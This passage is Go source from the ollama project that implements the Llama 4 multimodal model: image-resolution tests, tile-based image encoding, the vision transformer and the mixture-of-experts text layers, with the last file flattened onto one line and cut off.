		t.Errorf("supportedResolutions() mismatch (-want +got):\n%s", diff)
	}
}

// TestBestResolution covers exact fit, forced max canvas, intermediate
// sizes, and images smaller/larger than every candidate.
func TestBestResolution(t *testing.T) {
	tests := []struct {
		name        string
		size        image.Point
		resolutions []image.Point
		max         bool
		expected    image.Point
	}{
		{
			"normal",
			image.Point{800, 600},
			[]image.Point{{300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}},
			false,
			image.Point{800, 600},
		},
		{
			"max",
			image.Point{800, 600},
			[]image.Point{{300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}},
			true,
			image.Point{1600, 1200},
		},
		{
			"mid",
			image.Point{1000, 700},
			[]image.Point{{300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}},
			false,
			image.Point{1024, 768},
		},
		{
			"smol",
			image.Point{100, 100},
			[]image.Point{{300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}},
			false,
			image.Point{300, 200},
		},
		{
			"huge",
			image.Point{10000, 10000},
			[]image.Point{{300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}},
			false,
			image.Point{1600, 1200},
		},
	}

	p := ImageProcessor{}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			actual := p.bestResolution(tt.size, tt.resolutions, tt.max)
			if diff := gocmp.Diff(tt.expected, actual); diff != "" {
				t.Errorf("best resolution mismatch (-want +got):\n%s", diff)
			}
		})
	}
}

// TestMaxResolution checks aspect-preserving fit, including a skewed target.
func TestMaxResolution(t *testing.T) {
	tests := []struct {
		name      string
		origRes   image.Point
		targetRes image.Point
		expected  image.Point
	}{
		{
			"normal",
			image.Point{800, 600},
			image.Point{800, 600},
			image.Point{800, 600},
		},
		{
			"skew",
			image.Point{800, 600},
			image.Point{1100, 700},
			image.Point{933, 700},
		},
	}

	p := ImageProcessor{}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			actual := p.maxResolution(tt.origRes, tt.targetRes)
			if !reflect.DeepEqual(actual, tt.expected) {
				t.Errorf("max resolution; got %v want %v", actual, tt.expected)
			}
		})
	}
}

// TestProcessImage runs the full pipeline on a small synthetic image and
// checks the local buffer is one 336x336x3 tile, no global thumbnail is
// produced (single tile), and the reported target size matches.
func TestProcessImage(t *testing.T) {
	imgProc := ImageProcessor{
		imageSize:        336,
		patchSize:        16,
		numChannels:      3,
		maxUpscalingSize: 448,
	}

	// generateImage builds a 20x10 image with per-column colors derived
	// from seed, so different seeds produce different pixel data.
	generateImage := func(seed int) image.Image {
		width, height := 20, 10
		img := image.NewRGBA(image.Rect(0, 0, width, height))
		for x := range width {
			// Use the seed to vary color generation
			r := uint8((seed + x*11) % 256)
			g := uint8((seed + x*17) % 256)
			b := uint8((seed + x*23) % 256)
			c := color.RGBA{R: r, G: g, B: b, A: 255}
			for y := range height {
				img.Set(x, y, c)
			}
		}
		return img
	}

	pixelsLocal, pixelsGlobal, targetSize, err := imgProc.ProcessImage(generateImage(12))
	if err != nil {
		t.Error(err)
	}

	if n := len(pixelsLocal); n != 336*336*3 {
		t.Errorf("unexpected size of f32s: %d", n)
	}

	if n := len(pixelsGlobal); n > 0 {
		t.Errorf("unexpected size of f32s: %d", n)
	}

	if !targetSize.Eq(image.Point{336, 336}) {
		t.Errorf("unexpected target size: %v", targetSize)
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model.go
model/models/llama4/model.go
package llama4

import (
	"bytes"
	"image"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/model"
	"github.com/ollama/ollama/model/input"
)

// Model is the multimodal Llama 4 model: a vision tower ("v" tensors), a
// projector ("mm" tensors) mapping vision features into the text embedding
// space, and the text decoder.
type Model struct {
	model.Base
	model.BytePairEncoding
	ImageProcessor

	*VisionModel `gguf:"v"`
	*Projector   `gguf:"mm"`
	*TextModel
}

// Projector is the single linear layer that projects vision-tower outputs
// into the text model's embedding dimension.
type Projector struct {
	Linear1 *nn.Linear `gguf:"linear_1"`
}

func (p *Projector) Forward(ctx ml.Context, visionOutputs ml.Tensor) ml.Tensor {
	return p.Linear1.Forward(ctx, visionOutputs)
}

// New constructs the model from a GGUF config and wires up a wrapper cache:
// chunked attention (default chunk 8192) for the layers that use it, plus a
// standard causal cache.
func New(c fs.Config) (model.Model, error) {
	m := Model{
		BytePairEncoding: model.NewBytePairEncoding(
			&model.Vocabulary{
				Values: c.Strings("tokenizer.ggml.tokens"),
				Types:  c.Ints("tokenizer.ggml.token_type"),
				Merges: c.Strings("tokenizer.ggml.merges"),
				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true),
				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
				EOS: append(
					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
					c.Ints("tokenizer.ggml.eos_token_ids")...,
				),
			},
			// Llama-style pretokenizer split pattern.
			`[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+(?i:'s|'t|'re|'ve|'m|'ll|'d)?|[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*(?i:'s|'t|'re|'ve|'m|'ll|'d)?|\p{N}{1,3}| ?[^\s\p{L}\p{N}]+[\r\n/]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
		),
		ImageProcessor: newImageProcessor(c),
		VisionModel:    newVisionModel(c),
		TextModel:      newTextModel(c),
	}

	m.Cache = kvcache.NewWrapperCache(
		kvcache.NewChunkedAttentionCache(int32(c.Uint("attention.chunk_size", 8192)), m.Shift),
		kvcache.NewCausalCache(m.Shift),
	)

	return &m, nil
}

// EncodeMultimodal decodes an image, preprocesses it into local tiles (plus
// an optional global thumbnail), runs the vision tower and projector, and
// splits the projected sequence into per-tile chunks. Each chunk carries a
// separator marker telling PostTokenize which tile-separator token follows.
func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) {
	if len(m.VisionModel.Layers) < 1 {
		return nil, model.ErrNoVisionModel
	}

	img, _, err := image.Decode(bytes.NewReader(multimodalData))
	if err != nil {
		return nil, err
	}

	pixelsLocal, pixelsGlobal, size, err := m.ProcessImage(img)
	if err != nil {
		return nil, err
	}

	tilesLocal := ctx.Input().FromFloats(pixelsLocal, size.X, size.Y, m.numChannels)

	// ratioW x ratioH is the tile grid of the chosen canvas.
	ratioW, ratioH := size.X/m.imageSize, size.Y/m.imageSize

	// Rearrange the flat canvas into one imageSize x imageSize tile per
	// batch entry (ratioH*ratioW tiles total).
	tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW, ratioW, size.Y, m.numChannels).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)
	tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW*size.Y/ratioH, ratioH, ratioW, m.numChannels).Permute(ctx, 0, 3, 2, 1).Contiguous(ctx)
	tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW, size.Y/ratioH, m.numChannels, ratioH*ratioW)

	pixelValues := tilesLocal

	// The global thumbnail, when present, is appended as one more tile.
	if len(pixelsGlobal) > 0 {
		tilesGlobal := ctx.Input().FromFloats(pixelsGlobal, m.imageSize, m.imageSize, m.numChannels)
		pixelValues = pixelValues.Concat(ctx, tilesGlobal, 3)
	}

	visionOutputs := m.VisionModel.Forward(ctx, pixelValues)
	visionOutputs = visionOutputs.Reshape(ctx, visionOutputs.Dim(0), visionOutputs.Dim(1)*visionOutputs.Dim(2)*visionOutputs.Dim(3))

	projectedOutputs := m.Projector.Forward(ctx, visionOutputs)

	var multimodal []input.Multimodal
	aspectRatio := image.Point{ratioW, ratioH}

	var offset int
	patchesPerChunk := projectedOutputs.Dim(1)
	if aspectRatio.Y*aspectRatio.X > 1 {
		// Multi-tile: sequence holds ratioW*ratioH tiles plus the global
		// thumbnail, each with the same number of patches.
		patchesPerChunk = projectedOutputs.Dim(1) / (aspectRatio.X*aspectRatio.Y + 1)

		for range aspectRatio.Y {
			for x := range aspectRatio.X {
				view := projectedOutputs.Slice(ctx, 1, offset, offset+patchesPerChunk, 1)
				var separator separator
				if x < aspectRatio.X-1 {
					separator.x = true // <|tile_x_separator|>
				} else {
					separator.y = true // <|tile_y_separator|>
				}

				multimodal = append(multimodal, input.Multimodal{Tensor: view, Data: &separator})
				offset += patchesPerChunk
			}
		}
	}

	// Final chunk: the whole sequence for single-tile images, or the global
	// thumbnail for multi-tile; it carries an empty separator.
	view := projectedOutputs.Slice(ctx, 1, offset, offset+patchesPerChunk, 1)
	multimodal = append(multimodal, input.Multimodal{Tensor: view, Data: &separator{}})

	return multimodal, nil
}

// separator records which tile separator token should follow a chunk.
type separator struct {
	x bool // mid-row boundary: emit <|tile_x_separator|>
	y bool // end-of-row boundary: emit <|tile_y_separator|>
}

// PostTokenize expands every multimodal input into the Llama 4 image token
// layout: <|image_start|>, per-tile <|patch|> runs with separators, then
// <|image|>, the final patch run, and the image end token.
func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) {
	var result []*input.Input

	for _, inp := range inputs {
		if len(inp.Multimodal) == 0 {
			result = append(result, inp)
			continue
		}

		var imageInputs []*input.Input
		imageInputs = append(imageInputs, &input.Input{Token: 200080}) // <|image_start|>

		for i, mm := range inp.Multimodal {
			patchesPerChunk := mm.Tensor.Dim(1)

			if i < len(inp.Multimodal)-1 {
				separator := mm.Data.(*separator)

				// First patch token carries the tensor and batches the
				// whole run via SameBatch; the rest are placeholders.
				imageInputs = append(imageInputs, &input.Input{Token: 200092, Multimodal: []input.Multimodal{{Tensor: mm.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: patchesPerChunk}) // <|patch|>
				imageInputs = append(imageInputs, slices.Repeat([]*input.Input{{Token: 200092}}, patchesPerChunk-1)...)

				if separator.x {
					imageInputs = append(imageInputs, &input.Input{Token: 200084}) // <|tile_x_separator|>
				}

				if separator.y {
					imageInputs = append(imageInputs, &input.Input{Token: 200085}) // <|tile_y_separator|>
				}
			} else {
				imageInputs = append(imageInputs, &input.Input{Token: 200090}) // <|image|>
				imageInputs = append(imageInputs, &input.Input{Token: 200092, Multimodal: []input.Multimodal{{Tensor: mm.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: patchesPerChunk}) // <|patch|>
				imageInputs = append(imageInputs, slices.Repeat([]*input.Input{{Token: 200092}}, patchesPerChunk-1)...)
				// NOTE(review): comment says <|image_end|> but 200080 is the
				// same id used above for <|image_start|> — confirm whether
				// this should be the distinct image-end id.
				imageInputs = append(imageInputs, &input.Input{Token: 200080}) // <|image_end|>
			}
		}

		result = append(result, imageInputs...)
	}

	return result, nil
}

// Forward delegates to the text decoder with the batch positions tensor.
func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
	positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))
	return m.TextModel.Forward(ctx, batch.Inputs, positions, batch.Outputs, batch, m.Cache), nil
}

func init() {
	model.Register("llama4", New)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model_vision.go
model/models/llama4/model_vision.go
package llama4

import (
	"math"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
)

// VisionAttention is the self-attention block of a vision transformer layer.
type VisionAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// applyVisionRotaryEmbedding applies 2D rotary embedding to the input tensor.
// This is equivalent to the Pytorch implementation using half rotations:
//
//	cos, sin = torch.cos(freqs), torch.sin(freqs)
//	cos = cos.unsqueeze(-1)
//	sin = sin.unsqueeze(-1)
//	t = t.reshape(*t.shape[:-1], -1, 2)
//	t_out = (t * cos) + (_rotate_half(t) * sin)
//	t_out = t_out.flatten(3)
//
// Which is equivalent to the Pytorch implementation using complex numbers:
//
//	t_ = torch.view_as_complex(t.float().reshape(*t.shape[:-1], -1, 2))
//	freqs_ci = reshape_for_broadcast(freqs_ci=freq_cis, t=t_) # freqs_ci[:,:,None,:]
//	freqs_ci = freqs_ci.to(t_.device)
//	t_out = torch.view_as_real(t_ * freqs_ci).flatten(3)
//
// Due to the 1) the dimensional and 2) the datatype limitations of current backends,
// we need to use a different approach to achieve the same result.
func applyVisionRotaryEmbedding(ctx ml.Context, t, cos, sin ml.Tensor) ml.Tensor {
	width, height, channels, tiles := t.Dim(0), t.Dim(1), t.Dim(2), t.Dim(3)

	// t1 = t[..., 0::2]
	t1 := t.Slice(ctx, 0, 0, t.Dim(0), 2)
	// t2 = t[..., 1::2]
	t2 := t.Slice(ctx, 0, 1, t.Dim(0), 2)

	// cos_out = torch.stack((t1 * cos, t2 * cos), dim=-1)
	cosOut := t1.Mul(ctx, cos).Concat(ctx, t2.Mul(ctx, cos), 0)
	cosOut = cosOut.Reshape(ctx, cosOut.Dim(0)/2, 2, -1)
	cosOut = cosOut.Permute(ctx, 1, 0, 2, 3)
	cosOut = cosOut.Contiguous(ctx, width, height, channels, tiles)

	// sin_out = torch.stack((-t2 * sin, t1 * sin), dim=-1)
	sinOut := t2.Scale(ctx, -1).Mul(ctx, sin).Concat(ctx, t1.Mul(ctx, sin), 0)
	sinOut = sinOut.Reshape(ctx, sinOut.Dim(0)/2, 2, -1)
	sinOut = sinOut.Permute(ctx, 1, 0, 2, 3)
	sinOut = sinOut.Contiguous(ctx, width, height, channels, tiles)

	return cosOut.Add(ctx, sinOut)
}

// Forward runs multi-head self-attention with 2D rotary embeddings applied
// to queries and keys. The vision tower uses no KV cache (nil) — attention
// is full within the tile sequence.
func (sa *VisionAttention) Forward(ctx ml.Context, hiddenState, cos, sin ml.Tensor, opts *VisionOptions) ml.Tensor {
	headDim := opts.hiddenSize / opts.numHeads

	query := sa.Query.Forward(ctx, hiddenState)
	key := sa.Key.Forward(ctx, hiddenState)
	value := sa.Value.Forward(ctx, hiddenState)

	query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), query.Dim(2))
	key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), key.Dim(2))
	value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), value.Dim(2))

	query = applyVisionRotaryEmbedding(ctx, query, cos, sin)
	key = applyVisionRotaryEmbedding(ctx, key, cos, sin)

	attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), nil)
	attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), attention.Dim(3))
	return sa.Output.Forward(ctx, attention)
}

// VisionMLP is the two-layer GELU feed-forward block of a vision layer.
type VisionMLP struct {
	FC1 *nn.Linear `gguf:"fc1"`
	FC2 *nn.Linear `gguf:"fc2"`
}

func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor {
	hiddenStates = mlp.FC1.Forward(ctx, hiddenStates).GELU(ctx)
	hiddenStates = mlp.FC2.Forward(ctx, hiddenStates)
	return hiddenStates
}

// VisionLayer is one pre-norm transformer encoder block of the vision tower.
type VisionLayer struct {
	InputLayerNorm *nn.LayerNorm `gguf:"attn_norm"`
	*VisionAttention

	PostAttentionNorm *nn.LayerNorm `gguf:"ffn_norm"`
	*VisionMLP        `gguf:"mlp"`
}

// Forward applies norm → attention → residual, then norm → MLP → residual.
func (e *VisionLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionOptions) ml.Tensor {
	residual := hiddenStates

	// self attention
	hiddenStates = e.InputLayerNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.VisionAttention.Forward(ctx, hiddenStates, cos, sin, opts)
	hiddenStates = hiddenStates.Add(ctx, residual)

	// MLP
	residual = hiddenStates
	hiddenStates = e.PostAttentionNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.VisionMLP.Forward(ctx, hiddenStates, opts)
	hiddenStates = hiddenStates.Add(ctx, residual)

	return hiddenStates
}

// VisionAdapter performs the pixel-shuffle downsampling (trading spatial
// resolution for channel depth by pixelShuffleRatio on each axis) followed
// by a two-layer GELU MLP.
type VisionAdapter struct {
	FC1 *nn.Linear `gguf:"mlp.fc1"`
	FC2 *nn.Linear `gguf:"mlp.fc2"`
}

func (a *VisionAdapter) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor {
	// Patches form a square grid; recover its side length.
	patches := hiddenStates.Dim(1)
	patchSize := int(math.Sqrt(float64(patches)))

	hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), patchSize, patchSize, hiddenStates.Dim(2))

	channels, width, height, tiles := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2), hiddenStates.Dim(3)

	// Shuffle along width: fewer channels, wider rows.
	channels, width = int(float32(channels)/opts.pixelShuffleRatio), int(float32(width)*opts.pixelShuffleRatio)
	hiddenStates = hiddenStates.Reshape(ctx, channels, width, height, tiles)
	hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)

	// Shuffle along height symmetrically.
	channels, height = int(float32(channels)/opts.pixelShuffleRatio), int(float32(height)*opts.pixelShuffleRatio)
	hiddenStates = hiddenStates.Reshape(ctx, channels, width, height, tiles)
	hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)

	hiddenStates = hiddenStates.Reshape(ctx, channels, width*height, tiles)

	hiddenStates = a.FC1.Forward(ctx, hiddenStates).GELU(ctx)
	hiddenStates = a.FC2.Forward(ctx, hiddenStates).GELU(ctx)
	return hiddenStates
}

// VisionOptions holds vision-tower hyperparameters from the GGUF config.
type VisionOptions struct {
	hiddenSize, numHeads int
	imageSize, patchSize int

	ropeTheta float32
	eps       float32

	pixelShuffleRatio float32
}

// PatchEmbedding turns raw pixel tiles into patch embeddings: an IM2Col
// unfold over patchSize x patchSize windows followed by a linear projection.
type PatchEmbedding struct {
	*nn.Linear
}

func (p *PatchEmbedding) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor {
	// The kernel tensor only supplies the unfold geometry; its values are
	// never read (Empty allocation).
	kernel := ctx.Input().Empty(ml.DTypeF32, opts.patchSize, opts.patchSize, hiddenStates.Dim(2))
	hiddenStates = kernel.IM2Col(ctx, hiddenStates, opts.patchSize, opts.patchSize, 0, 0, 1, 1)
	hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), hiddenStates.Dim(1)*hiddenStates.Dim(2), hiddenStates.Dim(3))
	return p.Linear.Forward(ctx, hiddenStates)
}

// VisionModel is the full Llama 4 vision tower.
type VisionModel struct {
	Layers []VisionLayer `gguf:"blk"`

	*PatchEmbedding     `gguf:"patch_embedding"`
	ClassEmbedding      ml.Tensor `gguf:"class_embedding"`
	PositionalEmbedding ml.Tensor `gguf:"positional_embedding_vlm"`

	LayerNormPre  *nn.LayerNorm `gguf:"layernorm_pre"`
	LayerNormPost *nn.LayerNorm `gguf:"layernorm_post"`

	*VisionAdapter `gguf:"vision_adapter"`

	*VisionOptions
}

func newVisionModel(c fs.Config) *VisionModel {
	return &VisionModel{
		Layers: make([]VisionLayer, c.Uint("vision.block_count")),
		VisionOptions: &VisionOptions{
			hiddenSize: int(c.Uint("vision.embedding_length")),
			numHeads:   int(c.Uint("vision.attention.head_count")),
			imageSize:  int(c.Uint("vision.image_size")),
			patchSize:  int(c.Uint("vision.patch_size")),
			ropeTheta:  float32(c.Float("vision.rope.freq_base")),
			eps:        c.Float("vision.layer_norm_epsilon"),

			pixelShuffleRatio: float32(c.Float("vision.pixel_shuffle_ratio")),
		},
	}
}

// Forward embeds the pixel tiles, appends the class embedding (broadcast
// across tiles), adds positional embeddings, runs the encoder stack, and
// feeds the result through the pixel-shuffle adapter.
func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor {
	hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.VisionOptions)
	hiddenStates = hiddenStates.Concat(ctx, m.ClassEmbedding.Repeat(ctx, 2, hiddenStates.Dim(2)), 1)

	hiddenStates = hiddenStates.Add(ctx, m.PositionalEmbedding)
	hiddenStates = m.LayerNormPre.Forward(ctx, hiddenStates, m.eps)

	cos, sin := m.rotaryEmbedding(ctx)
	for _, layer := range m.Layers {
		hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionOptions)
	}

	hiddenStates = m.LayerNormPost.Forward(ctx, hiddenStates, m.eps)
	// Negative pad trims one position from dim 1 — presumably dropping the
	// appended class token before the adapter.
	hiddenStates = hiddenStates.Pad(ctx, 0, -1, 0, 0)
	hiddenStates = m.VisionAdapter.Forward(ctx, hiddenStates, m.VisionOptions)
	return hiddenStates
}

// floorDiv is a helper function to perform floor division. This mimics PyTorch's div(round_mode='floor') function
// which in turn mimics Python's // operator.
func floorDiv[T int | int16 | int32 | int64 | uint | uint16 | uint32 | uint64](a, b T) T {
	if b == 0 {
		panic("division by zero")
	}

	if (a >= 0 && b > 0) || (a <= 0 && b < 0) || a%b == 0 {
		return a / b
	}

	return a/b - 1
}

// rotaryEmbedding precomputes the 2D RoPE cos/sin tables for the patch grid
// (plus the class-token slot, which is left at zero frequency). Interleaved
// x/y frequencies are derived from each patch's column and row indices.
func (m *VisionModel) rotaryEmbedding(ctx ml.Context) (ml.Tensor, ml.Tensor) {
	patchesPerSide := m.imageSize / m.patchSize
	numPatches := patchesPerSide*patchesPerSide + 1

	headDim := m.hiddenSize / m.numHeads
	freqDim := headDim / 2

	freqs := make([]float32, numPatches*freqDim)
	for i := range numPatches - 1 {
		for j := 0; j < freqDim; j += 2 {
			// positionX indexes the x-frequency half, positionY the
			// y-frequency half of the flattened table.
			positionX := i*freqDim/2 + j/2
			positionY := (i+numPatches)*freqDim/2 + j/2

			ropeFreq := math.Pow(float64(m.ropeTheta), float64(j)*2/float64(headDim))

			// 1-based column index for x, 1-based row index for y.
			freqs[positionX] = float32(float64(1+i-floorDiv(i, patchesPerSide)*patchesPerSide) / ropeFreq)
			freqs[positionY] = float32(float64(1+floorDiv(i, patchesPerSide)) / ropeFreq)
		}
	}

	ropeFreqs := ctx.Input().FromFloats(freqs, freqDim/2, numPatches, 2)
	ropeFreqs = ropeFreqs.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)
	ropeFreqs = ropeFreqs.Reshape(ctx, freqDim, 1, numPatches)

	return ropeFreqs.Cos(ctx), ropeFreqs.Sin(ctx)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model_text.go
model/models/llama4/model_text.go
package llama4 import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` RopeFactors ml.Tensor `gguf:"rope_factors"` } func (sa *TextAttention) Forward(ctx ml.Context, hiddenStates, positions, attentionScales ml.Tensor, cache kvcache.Cache, useRope bool, opts *TextOptions) ml.Tensor { batchSize, headDim := hiddenStates.Dim(1), cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) if useRope { query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors) } if opts.useQKNorm { query = query.RMSNorm(ctx, nil, opts.eps) key = key.RMSNorm(ctx, nil, opts.eps) } if attentionScales != nil && !useRope { query = query.Mul(ctx, attentionScales) } attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return sa.Output.Forward(ctx, attention) } type TextMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *TextMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type TextExperts struct { Gate *nn.LinearBatch 
`gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (e *TextExperts) Forward(ctx ml.Context, hiddenStates, routerLogits ml.Tensor, opts *TextOptions) ml.Tensor { experts := routerLogits.TopK(ctx, opts.numExpertsUsed) scores := routerLogits.Sigmoid(ctx).Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, experts) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = hiddenStates.Repeat(ctx, 1, opts.numExpertsUsed) hiddenStates = hiddenStates.Mul(ctx, scores) upStates := e.Up.Forward(ctx, hiddenStates, experts) gateStates := e.Gate.Forward(ctx, hiddenStates, experts) downStates := e.Down.Forward(ctx, upStates.Mul(ctx, gateStates.SILU(ctx)), experts) nextStates := downStates.View(ctx, 0, hiddenStates.Dim(0), downStates.Stride(2), hiddenStates.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, downStates.View(ctx, i*downStates.Stride(1), hiddenStates.Dim(0), downStates.Stride(2), hiddenStates.Dim(2))) } return nextStates } type TextMOE struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Experts *TextExperts SharedExpert *TextMLP `gguf:",suf:_shexp"` } func (moe *TextMOE) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := moe.Router.Forward(ctx, hiddenStates) sharedStates := moe.SharedExpert.Forward(ctx, hiddenStates, opts) routedStates := moe.Experts.Forward(ctx, hiddenStates, routerLogits, opts) return sharedStates.Add(ctx, routedStates) } type TextFeedForward interface { Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor } type TextLayer struct { AttentionNorm *nn.LayerNorm `gguf:"attn_norm"` Attention *TextAttention FFNNorm *nn.LayerNorm `gguf:"ffn_norm"` FeedForward 
TextFeedForward } func (d *TextLayer) Forward(ctx ml.Context, hiddenStates, positions, attentionScales, outputs ml.Tensor, cache kvcache.Cache, useRope bool, opts *TextOptions) ml.Tensor { residual := hiddenStates // self attention hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, attentionScales, cache, useRope, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.FFNNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.FeedForward.Forward(ctx, hiddenStates, opts) return residual.Add(ctx, hiddenStates) } type TextOptions struct { hiddenSize int numHeads, numKVHeads, headDim int numExperts, numExpertsUsed int ropeDim int ropeBase, ropeScale float32 eps float32 interleaveLayerStep int noRopeInterval int useQKNorm bool attentionTemperatureTuning bool attentionScale float64 attentionFloorScale float64 } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors)) } type TextModel struct { Layers []TextLayer `gguf:"blk"` TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.LayerNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextOptions } func newTextModel(c fs.Config) *TextModel { layers := make([]TextLayer, c.Uint("block_count")) interleaveLayerStep := c.Uint("interleave_moe_layer_step", 1) for i := range layers { if (i+1)%int(interleaveLayerStep) == 0 { layers[i] = TextLayer{FeedForward: &TextMOE{}} } else { layers[i] = TextLayer{FeedForward: &TextMLP{}} } } return &TextModel{ Layers: layers, TextOptions: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: 
